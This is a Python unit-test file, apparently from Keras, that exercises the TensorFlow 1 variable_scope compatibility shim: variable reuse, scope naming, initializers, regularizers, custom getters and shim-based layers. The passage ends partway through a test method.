  @run_inside_wrap_function_in_eager_mode
  def testGetVar(self):
    # Same name + shape in the same store returns the identical variable.
    vs = variable_scope._get_default_variable_store()
    v = vs.get_variable("v", [1])
    v1 = vs.get_variable("v", [1])
    self.assertIs(v, v1)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testNameExists(self):
    vs = variable_scope._get_default_variable_store()
    # No check by default, so we can both create and get existing names.
    v = vs.get_variable("v", [1])
    v1 = vs.get_variable("v", [1])
    self.assertIs(v, v1)
    self.assertIsNot(v, vs.get_variable("u", [1], reuse=False))

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testNamelessStore(self):
    # Variables land in the store's _vars dict under their ":0" tensor names.
    vs = variable_scope._get_default_variable_store()
    vs.get_variable("v1", [2])
    vs.get_variable("v2", [2])
    expected_names = ["%s:0" % name for name in ["v1", "v2"]]
    self.assertEqual(
        set(expected_names), set(v.name for v in vs._vars.values()))

  # TODO(mihaimaruseac): Not converted to use wrap_function because of
  # TypeError: Expected tf.group() expected Tensor arguments not 'None' with
  # type '<type 'NoneType'>'
  @test_util.run_in_graph_and_eager_modes
  def testVarScopeInitializer(self):
    # A scope-level initializer applies to variables created inside it.
    init = tf.compat.v1.constant_initializer(0.3)
    with tf.compat.v1.variable_scope("tower0") as tower:
      with tf.compat.v1.variable_scope("foo", initializer=init):
        v = tf.compat.v1.get_variable("v", [])
        self.evaluate(tf.compat.v1.variables_initializer([v]))
        self.assertAllClose(self.evaluate(v.value()), 0.3)
      with tf.compat.v1.variable_scope(tower, initializer=init):
        w = tf.compat.v1.get_variable("w", [])
        self.evaluate(tf.compat.v1.variables_initializer([w]))
        self.assertAllClose(self.evaluate(w.value()), 0.3)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeConstraint(self):
    # A scope-level constraint is attached to variables created inside it.
    constraint = lambda x: 0. * x
    with tf.compat.v1.variable_scope("tower1") as tower:
      with tf.compat.v1.variable_scope("foo", constraint=constraint):
        v = tf.compat.v1.get_variable("v", [])
        self.assertIsNotNone(v.constraint)
      with tf.compat.v1.variable_scope(tower, constraint=constraint):
        w = tf.compat.v1.get_variable("w", [])
        self.assertIsNotNone(w.constraint)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeDType(self):
    # A scope-level dtype becomes the default dtype of contained variables.
    with tf.compat.v1.variable_scope("tower2") as tower:
      with tf.compat.v1.variable_scope("foo", dtype=tf.float16):
        v = tf.compat.v1.get_variable("v", [])
        self.assertEqual(v.dtype.base_dtype, tf.float16)
      with tf.compat.v1.variable_scope(tower, dtype=tf.float16):
        w = tf.compat.v1.get_variable("w", [])
        self.assertEqual(w.dtype.base_dtype, tf.float16)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testInitFromNonTensorValue(self):
    # Plain Python/numpy values are accepted as initializers.
    v = tf.compat.v1.get_variable("v4", initializer=4, dtype=tf.int32)
    self.evaluate(tf.compat.v1.variables_initializer([v]))
    self.assertAllClose(self.evaluate(v.value()), 4)

    w = tf.compat.v1.get_variable(
        "w4", initializer=numpy.array([1, 2, 3]), dtype=tf.int64)
    self.evaluate(tf.compat.v1.variables_initializer([w]))
    self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])

    # A quirk to be revisited?
    error = ValueError if tf.executing_eagerly() else TypeError
    with self.assertRaises(error):
      tf.compat.v1.get_variable("x4", initializer={})

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testInitFromNonInitializer(self):
    # Test various dtypes with zeros initializer as following:
    types = [
        tf.int8, tf.uint8, tf.int16, tf.uint16, tf.int32,
        tf.int64, tf.bool
    ]

    # Use different variable_name to distinguish various dtypes
    for (i, dtype) in enumerate(types):
      x = tf.compat.v1.get_variable(
          name="xx%d" % i, shape=(3, 4), dtype=dtype)
      y = tf.compat.v1.get_variable(
          name="yy%d" % i,
          shape=(3, 4),
          dtype=dtype,
          initializer=tf.compat.v1.zeros_initializer(dtype=dtype))
      self.evaluate(tf.compat.v1.global_variables_initializer())
      self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeRegularizer(self):
    # Scope-level regularizers can be set, replaced, and disabled mid-scope.
    init = tf.compat.v1.constant_initializer(0.3)

    def regularizer1(v):
      return tf.reduce_mean(v) + 0.1

    def regularizer2(v):
      return tf.reduce_mean(v) + 0.2

    with tf.compat.v1.variable_scope(
        "tower3", regularizer=regularizer1) as tower:
      with tf.compat.v1.variable_scope("foo", initializer=init):
        v = tf.compat.v1.get_variable("v", [])
        self.evaluate(tf.compat.v1.variables_initializer([v]))
      with tf.compat.v1.variable_scope(tower, initializer=init) as vs:
        tf.compat.v1.get_variable("u", [])
        vs.set_regularizer(regularizer2)
        tf.compat.v1.get_variable("w", [])
        # Next 3 variable not regularized to test disabling regularization.
        tf.compat.v1.get_variable(
            "x", [], regularizer=tf.compat.v1.no_regularizer)
        with tf.compat.v1.variable_scope(
            "baz", regularizer=tf.compat.v1.no_regularizer):
          tf.compat.v1.get_variable("y", [])
        vs.set_regularizer(tf.compat.v1.no_regularizer)
        tf.compat.v1.get_variable("z", [])

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testInitializeFromValue(self):
    # A constant Tensor initializer fixes both the value and the shape.
    init = tf.constant(0.1)
    w = tf.compat.v1.get_variable("v", initializer=init)
    self.evaluate(tf.compat.v1.variables_initializer([w]))
    self.assertAllClose(self.evaluate(w.value()), 0.1)

    with self.assertRaisesRegex(ValueError, "shape"):
      # We disallow explicit shape specification when initializer is constant.
      tf.compat.v1.get_variable("u", [1], initializer=init)

    with tf.compat.v1.variable_scope("foo", initializer=init):
      # Constant initializer can be passed through scopes if needed.
      v = tf.compat.v1.get_variable("v")
      self.evaluate(tf.compat.v1.variables_initializer([v]))
      self.assertAllClose(self.evaluate(v.value()), 0.1)

    # Check that non-float32 initializer creates a non-float32 variable.
    init = tf.constant(1, dtype=tf.int32)
    t = tf.compat.v1.get_variable("t", initializer=init)
    self.assertEqual(t.dtype.base_dtype, tf.int32)

    # Raise error if `initializer` dtype and `dtype` are not identical.
    with self.assertRaisesRegex(ValueError, "don't match"):
      tf.compat.v1.get_variable("s", initializer=init, dtype=tf.float64)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeGetOrCreateReuse(self):
    # AUTO_REUSE creates the variable on first use and reuses it afterwards.
    with self.cached_session():

      def test_value(value):
        x = tf.constant(value)
        with tf.compat.v1.variable_scope(
            "testVarScopeGetOrCreateReuse_bar",
            reuse=tf.compat.v1.AUTO_REUSE):
          _ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
        with tf.compat.v1.variable_scope(
            "testVarScopeGetOrCreateReuse_bar",
            reuse=tf.compat.v1.AUTO_REUSE):
          _ = tf.compat.v1.get_variable("var", [])
        self.assertEqual(value, self.evaluate(x))

      test_value(42.)  # Variable is created.
      test_value(13.)  # Variable is reused hereafter.
      test_value(17.)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeGetOrCreateReuseIgnoreFalse(self):
    with self.cached_session():

      def test_value(value):
        x = tf.constant(value)
        with tf.compat.v1.variable_scope(
            "testVarScopeGetOrCreateReuse_bar",
            reuse=False):
          _ = tf.compat.v1.assign(tf.compat.v1.get_variable("var", []), x)
        # We need to ignore reuse=False in the shim, because the
        # code is expected to get rerun each time the user calls the shim.
        with tf.compat.v1.variable_scope(
            "testVarScopeGetOrCreateReuse_bar",
            reuse=False):
          _ = tf.compat.v1.get_variable("var", [])
        self.assertEqual(value, self.evaluate(x))

      test_value(42.)  # Variable is created.
      test_value(13.)  # Variable is reused hereafter.
      test_value(17.)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScope(self):
    # Default-name scopes ("default") are uniquified: default, default_1, ...
    with self.cached_session():
      with tf.name_scope("testVarOpScope1"):
        with tf.compat.v1.variable_scope("tower", "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "tower/w:0")

      with tf.name_scope("testVarOpScope2"):
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "default/w:0")
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "default_1/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
    # Uniquification is per exact default name, even when one name is a
    # substring of another ("defaultScope" vs "defaultScope1").
    with self.cached_session():
      with tf.compat.v1.variable_scope(None, "defaultScope1"):
        with tf.compat.v1.variable_scope(None, "layer"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name,
              "defaultScope1/layer/w:0")
      with tf.compat.v1.variable_scope(None, "defaultScope1"):
        with tf.compat.v1.variable_scope(None, "layer"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name,
              "defaultScope1_1/layer/w:0")
      with tf.compat.v1.variable_scope(None, "defaultScope"):
        with tf.compat.v1.variable_scope(None, "layer"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name,
              "defaultScope/layer/w:0")
      with tf.compat.v1.variable_scope(None, "defaultScope1"):
        with tf.compat.v1.variable_scope(None, "layer"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name,
              "defaultScope1_2/layer/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScopeUniqueNamesWithJump(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope("default") as default:
        with tf.compat.v1.variable_scope(None, "layer"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "default/layer/w:0")
        with tf.compat.v1.variable_scope(None, "layer"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name,
              "default/layer_1/w:0")
        with tf.compat.v1.variable_scope(default):
          pass
        # No matter the jump in the middle, unique numbering continues.
        with tf.compat.v1.variable_scope(None, "layer"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name,
              "default/layer_2/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScopeReuse(self):
    # Re-entering a scope object with reuse=True resolves the same names.
    with self.cached_session():
      with tf.compat.v1.variable_scope("outer") as outer:
        with tf.compat.v1.variable_scope("tower", "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

      with tf.compat.v1.variable_scope(outer, reuse=True) as outer:
        with tf.compat.v1.variable_scope("tower", "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeGetVar(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope("root"):
        with tf.compat.v1.variable_scope("towerA") as tower_a:
          va = tf.compat.v1.get_variable("v", [1])
          self.assertEqual(va.name, "root/towerA/v:0")

        with tf.compat.v1.variable_scope(tower_a, reuse=True):
          va2 = tf.compat.v1.get_variable("v", [1])
          self.assertIs(va2, va)

        with tf.compat.v1.variable_scope("towerB"):
          vb = tf.compat.v1.get_variable("v", [1])
          self.assertEqual(vb.name, "root/towerB/v:0")

        with tf.compat.v1.variable_scope("towerA", reuse=True):
          va2 = tf.compat.v1.get_variable("v", [1])
          self.assertIs(va2, va)

        with tf.compat.v1.variable_scope("foo"):
          with tf.compat.v1.variable_scope("bar"):
            v = tf.compat.v1.get_variable("v", [1])
            self.assertEqual(v.name, "root/foo/bar/v:0")
            # Reusing a scope object jumps back to its absolute path.
            with tf.compat.v1.variable_scope(tower_a, reuse=True):
              va3 = tf.compat.v1.get_variable("v", [1])
              self.assertIs(va, va3)

        # Mismatched shape/dtype on reuse must raise.
        with self.assertRaises(ValueError) as exc:
          with tf.compat.v1.variable_scope(tower_a, reuse=True):
            tf.compat.v1.get_variable("v", [2])  # Different shape.
        self.assertEqual("shape" in str(exc.exception), True)

        with self.assertRaises(ValueError) as exc:
          with tf.compat.v1.variable_scope(tower_a, reuse=True):
            tf.compat.v1.get_variable("v", [1], dtype=tf.int32)
        self.assertEqual("dtype" in str(exc.exception), True)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeOuterScope(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope("outer") as outer:
        pass
      with tf.compat.v1.variable_scope(outer):
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        with tf.compat.v1.variable_scope("default"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

      with tf.compat.v1.variable_scope(outer, reuse=True):
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        with tf.compat.v1.variable_scope("default", reuse=True):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarScopeNestedOuterScope(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope("outer") as outer:
        with tf.compat.v1.variable_scope(outer):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        with tf.compat.v1.variable_scope("default"):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

      with tf.compat.v1.variable_scope(outer, reuse=True):
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        with tf.compat.v1.variable_scope("default", reuse=True):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScopeReuseParam(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope("outer") as outer:
        with tf.compat.v1.variable_scope("tower", "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

      with tf.compat.v1.variable_scope(outer) as outer:
        with tf.compat.v1.variable_scope("tower", "default", reuse=True):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")
        outer.reuse_variables()
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScopeReuseError(self):
    # reuse=True with a default-name (None) scope is invalid.
    with self.cached_session():
      with self.assertRaises(ValueError):
        with tf.compat.v1.variable_scope(None, "default", reuse=True):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/tower/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScopeOuterScope(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope("outer") as outer:
        pass
      with tf.compat.v1.variable_scope(outer, "default", []):
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

      with tf.compat.v1.variable_scope(outer, "default", reuse=True):
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        outer.reuse_variables()
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVarOpScopeNestedOuterScope(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope("outer") as outer:
        with tf.compat.v1.variable_scope(outer, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

      with tf.compat.v1.variable_scope(outer, "default", reuse=True):
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "outer/w:0")
        with tf.compat.v1.variable_scope(None, "default", []):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testBasicWhenAuxiliaryNameScopeIsFalse(self):
    # auxiliary_name_scope=False suppresses the companion tf.name_scope but
    # keeps variable-name prefixes intact.
    with self.cached_session():
      with tf.compat.v1.variable_scope(
          "scope", auxiliary_name_scope=False) as scope:
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "scope/w:0")
      with tf.compat.v1.variable_scope(scope, auxiliary_name_scope=False):
        self.assertEqual(
            tf.compat.v1.get_variable("w1", []).name, "scope/w1:0")

      with tf.compat.v1.variable_scope("outer"):
        with tf.compat.v1.variable_scope(
            "inner", auxiliary_name_scope=False) as inner:
          self.assertEqual(inner.original_name_scope, "outer/")
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
        with tf.compat.v1.variable_scope(
            inner, auxiliary_name_scope=False) as inner1:
          self.assertEqual(inner1.original_name_scope, "outer/")
          self.assertEqual(
              tf.compat.v1.get_variable("w1", []).name, "outer/inner/w1:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
    with self.cached_session():
      with tf.compat.v1.variable_scope(
          None, default_name="default", auxiliary_name_scope=False):
        self.assertEqual(
            tf.compat.v1.get_variable("w", []).name, "default/w:0")

      with tf.compat.v1.variable_scope("outer"):
        with tf.compat.v1.variable_scope(
            None, default_name="default",
            auxiliary_name_scope=False) as inner:
          self.assertEqual(inner.original_name_scope, "outer/")
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/default/w:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
    with self.cached_session():
      root_scope = tf.compat.v1.get_variable_scope()
      with tf.compat.v1.variable_scope(
          root_scope, auxiliary_name_scope=False):
        self.assertEqual(tf.compat.v1.get_variable("w", []).name, "w:0")

      with tf.compat.v1.variable_scope("outer"):
        with tf.compat.v1.variable_scope(
            root_scope, auxiliary_name_scope=False) as inner:
          self.assertEqual(inner.original_name_scope, "")
          self.assertEqual(tf.compat.v1.get_variable("w1", []).name, "w1:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testAuxiliaryNameScopeIsInvalid(self):
    # Non-boolean auxiliary_name_scope values must be rejected.
    with self.cached_session():
      with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
        with tf.compat.v1.variable_scope(
            None, default_name="scope", auxiliary_name_scope="invalid"):
          pass

      with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
        with tf.compat.v1.variable_scope(
            "scope", auxiliary_name_scope="invalid"):
          pass

      with tf.compat.v1.variable_scope("scope") as scope:
        pass
      with self.assertRaisesRegex(TypeError, "auxiliary_name_scope"):
        with tf.compat.v1.variable_scope(
            scope, auxiliary_name_scope="invalid"):
          pass

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testReuseScopeWithoutNameScopeCollision(self):
    # Github issue: #13429
    with self.cached_session():
      with tf.compat.v1.variable_scope("outer"):
        with tf.compat.v1.variable_scope("inner") as inner:
          pass

      with tf.compat.v1.variable_scope(
          inner, auxiliary_name_scope=False) as scope:
        with tf.name_scope(scope.original_name_scope):
          self.assertEqual(
              tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")

      with tf.compat.v1.variable_scope("another"):
        with tf.compat.v1.variable_scope(
            inner, auxiliary_name_scope=False) as scope1:
          with tf.name_scope(scope1.original_name_scope):
            self.assertEqual(
                tf.compat.v1.get_variable("w1", []).name,
                "outer/inner/w1:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testGetVarWithDevice(self):
    # A device function observes variable creation ops and their dtypes.
    g = tf.Graph()
    varname_type = []

    def device_func(op):
      if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
        varname_type.append((op.name, op.get_attr("dtype")))
      return "/device:GPU:0"

    with g.as_default():
      with tf.compat.v1.device(device_func):
        _ = tf.compat.v1.get_variable("x", (100, 200))
        _ = tf.compat.v1.get_variable(
            "y", dtype=tf.int64, initializer=numpy.arange(73))
    self.assertEqual(varname_type[0], ("x", tf.float32))
    self.assertEqual(varname_type[1], ("y", tf.int64))

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testGetVariableWithRefDtype(self):
    v = tf.compat.v1.get_variable("v", shape=[3, 4], dtype=tf.float32)
    # Ensure it is possible to do get_variable with a _ref dtype passed in.
    _ = tf.compat.v1.get_variable("w", shape=[5, 6], dtype=v.dtype)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testGetVariableWithInitializerWhichTakesNoArgs(self):
    v = tf.compat.v1.get_variable("foo", initializer=lambda: [2])
    self.assertEqual(v.name, "foo:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
    v = tf.compat.v1.get_variable("foo", initializer=lambda x=True: [2])
    self.assertEqual(v.name, "foo:0")

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testTwoGraphs(self):
    # "_" is rejected as a scope name; the regex tolerates both the plain and
    # "root scope" phrasings of the error message.

    def f():
      g1 = tf.Graph()
      g2 = tf.Graph()
      with g1.as_default():
        with g2.as_default():
          with tf.compat.v1.variable_scope("_"):
            pass

    self.assertRaisesRegex(ValueError,
                           "'_' is not a valid (?:root )?scope name", f)
class VariableScopeWithCustomGetterTest(tf.test.TestCase):
  """Tests for custom getters and variable-creator scopes under the shim."""

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testNonCallableGetterFails(self):
    # A non-callable custom_getter must be rejected, both on the scope and
    # directly on get_variable.
    with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
      with tf.compat.v1.variable_scope("scope0", custom_getter=3):
        tf.compat.v1.get_variable("name0")
    with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
      tf.compat.v1.get_variable("name0", custom_getter=3)

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testNoSideEffectsWithIdentityCustomGetter(self):
    called = [0]

    def custom_getter(getter, *args, **kwargs):
      called[0] += 1
      return getter(*args, **kwargs)

    with tf.compat.v1.variable_scope(
        "scope", custom_getter=custom_getter) as scope:
      v = tf.compat.v1.get_variable("v", [1])
    with tf.compat.v1.variable_scope(scope, reuse=True):
      v2 = tf.compat.v1.get_variable("v", [1])
    with tf.compat.v1.variable_scope("new_scope") as new_scope:
      v3 = tf.compat.v1.get_variable("v3", [1])
    with tf.compat.v1.variable_scope(
        new_scope, reuse=True, custom_getter=custom_getter):
      v4 = tf.compat.v1.get_variable("v3", [1])

    self.assertIs(v, v2)
    self.assertIs(v3, v4)
    self.assertEqual(3, called[0])  # skipped one in the first new_scope

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testSynchronizationAndAggregationWithCustomGetter(self):
    called = [0]
    synchronization = tf.VariableSynchronization.AUTO
    aggregation = tf.compat.v1.VariableAggregation.NONE

    def custom_getter(getter, *args, **kwargs):
      called[0] += 1
      # Verify synchronization and aggregation kwargs are as expected.
      self.assertEqual(kwargs["synchronization"], synchronization)
      self.assertEqual(kwargs["aggregation"], aggregation)
      return getter(*args, **kwargs)

    with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
      tf.compat.v1.get_variable("v", [1])
    self.assertEqual(1, called[0])

    with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
      synchronization = tf.VariableSynchronization.ON_READ
      aggregation = tf.compat.v1.VariableAggregation.MEAN
      tf.compat.v1.get_variable(
          "v1", [1], synchronization=synchronization, aggregation=aggregation)
    self.assertEqual(2, called[0])

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVariableCreator(self):
    # Creators stack: the innermost one (creator_b) runs first and can
    # rewrite kwargs seen by the outer one (creator_a).
    variable_names = []

    def creator_a(next_creator, **kwargs):
      variable_names.append(kwargs.get("name", ""))
      return next_creator(**kwargs)

    def creator_b(next_creator, **kwargs):
      kwargs["name"] = "forced_name"
      return next_creator(**kwargs)

    with tf.variable_creator_scope(creator_a):
      with tf.variable_creator_scope(creator_b):
        tf.compat.v1.Variable(1.0, name="one_name")

    self.assertEqual(variable_names[0], "forced_name")

    called = [False]

    def creater_c(next_creator, **kwargs):
      called[0] = True
      self.assertEqual(kwargs["synchronization"],
                       tf.VariableSynchronization.ON_WRITE)
      self.assertEqual(kwargs["aggregation"],
                       tf.compat.v1.VariableAggregation.MEAN)
      return next_creator(**kwargs)

    with tf.variable_creator_scope(creater_c):
      tf.compat.v1.get_variable(
          "v", [],
          synchronization=tf.VariableSynchronization.ON_WRITE,
          aggregation=tf.compat.v1.VariableAggregation.MEAN)
    self.assertTrue(called[0])

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testVariableCreatorNestingError(self):
    # Exiting a creator scope out of LIFO order must raise RuntimeError.

    def creator(next_creator, **kwargs):
      return next_creator(**kwargs)

    # Save the state so we can clean up at the end.
    graph = tf.compat.v1.get_default_graph()
    old_creator_stack = graph._variable_creator_stack

    try:
      scope = tf.variable_creator_scope(creator)
      scope.__enter__()
      with tf.variable_creator_scope(creator):
        with self.assertRaises(RuntimeError):
          scope.__exit__(None, None, None)
    finally:
      graph._variable_creator_stack = old_creator_stack
class VariableScopeMultithreadedTest(tf.test.TestCase):
  """Checks that a variable scope captured on the main thread can be
  re-entered from a worker thread."""

  @test_util.run_in_graph_and_eager_modes
  @run_inside_wrap_function_in_eager_mode
  def testReenterMainScope(self):

    def thread_fn(graph, main_thread_scope):
      with graph.as_default():
        # Variable created with main scope will have prefix "main".
        with tf.compat.v1.variable_scope(main_thread_scope):
          with tf.compat.v1.variable_scope("foo"):
            v = tf.compat.v1.get_variable("v", [])
            self.assertEqual("main/foo/v:0", v.name)

        # Variable created outside main scope will not have prefix "main".
        with tf.compat.v1.variable_scope("bar"):
          v = tf.compat.v1.get_variable("v", [])
          self.assertEqual("bar/v:0", v.name)

    graph = tf.compat.v1.get_default_graph()
    with tf.compat.v1.variable_scope("main") as main_thread_scope:
      thread = threading.Thread(
          target=thread_fn, args=(graph, main_thread_scope))
      thread.start()
      # join() keeps the scope alive until the worker's assertions finish.
      thread.join()
class CompatV1TemplateScaleByY(variable_scope_shim.VariableScopeLayer):
  """Shim-based layer that multiplies its input by a templated TF1 variable.

  The scalar "y" is created through `tf.compat.v1.make_template`, so repeated
  calls share the same variable; `forward_pass` invokes the template inside a
  "foo" variable scope.
  """

  def __init__(self, **kwargs):
    super().__init__(**kwargs)

    def my_op(x, scalar_name):
      # Scalar variable initialized to 1.5 with an L2 regularizer attached.
      var1 = tf.compat.v1.get_variable(
          scalar_name,
          shape=[],
          regularizer=regularizers.L2(),
          initializer=tf.compat.v1.constant_initializer(1.5))
      return x * var1

    self.scale_by_y = tf.compat.v1.make_template(
        "scale_by_y", my_op, scalar_name="y")

  def forward_pass(self, inputs):
    with tf.compat.v1.variable_scope("foo"):
      return self.scale_by_y(inputs)
class VariableScopeModule(tf.Module):
  """Module that uses the shim."""

  @variable_scope_shim.track_tf1_style_variables
  def __call__(self, *args, **kwargs):
    # Delegate to the subclass-provided forward_pass under this module's
    # name scope; the decorator tracks TF1-style get_variable calls.
    with self.name_scope:
      return self.forward_pass(*args, **kwargs)

  def get_compat_v1_regularization_losses(self):
    """Dict w/ regularization losses from `get_variable`&`compat.v1.layers`."""
    return {name: regularizer() for name, regularizer
            in self._tf1_style_var_store._regularizers.items()}  # pylint: disable=protected-access
@combinations.generate(combinations.combine(mode=["eager"]))
class TF1VariableScopeLayerTest(tf.test.TestCase, parameterized.TestCase):
  """Tests the TF1 variable-scope shim: variable naming, reuse across calls,
  regularization-loss tracking, templates, nesting, and SavedModel export."""
  def test_get_variable(self):
    # Test the shim when using `get_variable` (and regularizers) directly
    class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
      def __init__(self, units, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.units = units
      def forward_pass(self, inputs, training=None):
        out = inputs
        with tf.compat.v1.variable_scope("dense_one"):
          # The weights are created with a `regularizer`,
          # so the layer should track their regularization losses
          kernel = tf.compat.v1.get_variable(
              shape=[out.shape[-1], self.units],
              regularizer=regularizers.L2(),
              initializer=tf.compat.v1.ones_initializer(),
              name="kernel")
          bias = tf.compat.v1.get_variable(
              shape=[self.units,],
              initializer=tf.compat.v1.zeros_initializer(),
              name="bias")
          out = tf.matmul(out, kernel)
